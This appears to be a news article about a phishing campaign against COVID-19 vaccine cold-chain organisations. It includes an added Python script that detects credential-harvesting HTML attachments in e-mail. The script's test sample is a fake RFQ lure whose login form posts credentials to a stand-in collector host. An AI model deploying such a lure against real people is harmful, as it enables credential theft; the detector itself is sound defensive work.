A sophisticated global phishing operation has been underway since September 2020, targeting entities involved in the distribution of COVID-19 vaccines. According to IBM Security X-Force researchers, these attacks, believed to be orchestrated by a nation-state actor, focus on the vaccine cold chain—the critical supply line managing the storage and transport of the vaccine at controlled temperatures.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has responded to this alarming trend by issuing a warning, advising organizations involved in Operation Warp Speed (OWS) to review potential indicators of compromise (IoCs) and enhance their security measures.

While it remains unclear if the phishing attempts achieved any success, IBM has alerted the appropriate authorities about these targeted attacks. The emails primarily targeted organizations spanning Italy, Germany, South Korea, the Czech Republic, and other regions, including notable bodies like the European Commission’s Directorate-General for Taxation and Customs Union and various private firms linked to the vaccine supply chain.

IBM’s analysis indicates that attackers focused on organizations tied to the Gavi vaccine alliance, aiming to gather credentials that would allow for unauthorized access to corporate networks and sensitive COVID-19 distribution data. To lend legitimacy to their deceit, the phishing emails were crafted to resemble requests for quotations related to vaccine program participation. In one instance, the attackers impersonated a business executive associated with Haier Biomedical, a legitimate player in the cold chain sector, to make the messages appear trustworthy.

According to IBM researchers Claire Zaboeva and Melissa Frydrych, “The emails contain malicious HTML attachments that require recipients to submit their credentials to view the file.” The activity suggests a clear intent to exploit harvested usernames and passwords for further espionage and theft of intellectual property across victim organizations.
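The lure described above, an HTML attachment that renders a login form and posts whatever the recipient types to an attacker-controlled host, can be triaged mechanically before a user ever opens it. The script below is an added example written for this article, not IBM X-Force's or CISA's tooling; the sample message, the sender address, the `.invalid` domains and the "RFQ.html" filename are all constructed for illustration and are not indicators from the campaign. It parses an `.eml`, looks only at attached HTML files (not the HTML body), and flags those that contain a password field together with a form that submits to an external http(s) URL.

```python
"""Flag e-mails carrying HTML attachments that ask for credentials.

Added example (not IBM's or CISA's code): a minimal triage check a mail
gateway or SOC analyst could run over .eml files. It looks for the pattern
described in the article: an HTML attachment that renders a login form and
posts the entered credentials to an external host.
"""
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormScanner(HTMLParser):
    """Collect form actions and input types from an HTML document."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.input_types = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.form_actions.append(attrs.get("action") or "")
        elif tag == "input":
            # HTML defaults an <input> without a type to "text"
            self.input_types.append((attrs.get("type") or "text").lower())


def scan_html(html_text):
    """Return credential-harvesting indicators found in one HTML document."""
    scanner = _FormScanner()
    scanner.feed(html_text)
    # A relative action ("/login") posts back to wherever the file is opened
    # from; an absolute http(s) action in a local file ships data off-host.
    external_actions = [
        a for a in scanner.form_actions
        if urlparse(a).scheme in ("http", "https")
    ]
    return {
        "has_password_field": "password" in scanner.input_types,
        "external_form_actions": external_actions,
    }


def scan_eml(raw_eml):
    """Return [(filename, indicators)] for suspicious HTML attachments."""
    msg = email.message_from_string(raw_eml, policy=policy.default)
    findings = []
    for part in msg.walk():
        filename = part.get_filename() or ""
        is_html = (part.get_content_type() == "text/html"
                   or filename.lower().endswith((".html", ".htm")))
        if not is_html or part.get_content_disposition() != "attachment":
            continue  # skip the inline HTML body; only attached files matter
        indicators = scan_html(part.get_content())
        if indicators["has_password_field"] and indicators["external_form_actions"]:
            findings.append((filename, indicators))
    return findings


# Constructed sample modelled on the lure the article describes (fake sender,
# fake collector domain, hypothetical RFQ theme). Not a real message or IoC.
SAMPLE_EML = """\
From: "Procurement" <quotes@example.invalid>
To: logistics@example.org
Subject: Request for Quotation - cold chain equipment
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Please review the attached RFQ and reply with pricing.

--b1
Content-Type: text/html; charset="utf-8"; name="RFQ.html"
Content-Disposition: attachment; filename="RFQ.html"

<html><body>
<p>Sign in with your corporate email to view this document.</p>
<form method="post" action="https://collector.example.invalid/login">
  <input name="user" type="text">
  <input name="pass" type="password">
  <input type="submit" value="View">
</form>
</body></html>

--b1--
"""

if __name__ == "__main__":
    for name, ind in scan_eml(SAMPLE_EML):
        print(f"suspicious attachment {name!r}: posts to {ind['external_form_actions']}")
```

The check is deliberately narrow so that it produces few false positives: an HTML attachment with a password field whose form posts to a relative path, or one with no form at all, is not flagged. In a gateway it would sit alongside the usual controls (blocking or sandboxing HTML attachments outright, and matching published IoCs) rather than replace them.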

Within the wider context of cybersecurity, the ongoing focus on COVID-19 vaccine research represents a lucrative target for malicious cyber activity. Since early 2020, the development and research surrounding COVID-19 vaccines have faced persistent cyber threats. Earlier this year, IBM revealed a similar phishing campaign against a German entity involved in personal protective equipment procurement.

These escalating cyber assaults prompted the U.S. Department of Justice to file charges against two Chinese nationals linked to efforts to steal sensitive data from various organizations, including those producing COVID-19 vaccines. Recent incidents have also highlighted attacks purportedly carried out by state-sponsored actors from Russia and North Korea, targeting pharmaceutical companies involved in vaccine development worldwide.

The tactics employed in these attacks align with several categories outlined in the MITRE ATT&CK framework, notably initial access and credential harvesting, as well as the lateral movement techniques that typically follow access to compromised systems. While the threat actor's identity remains unconfirmed, their strategies underscore a continued vulnerability across organizations critical to vaccine distribution and public health preparedness.
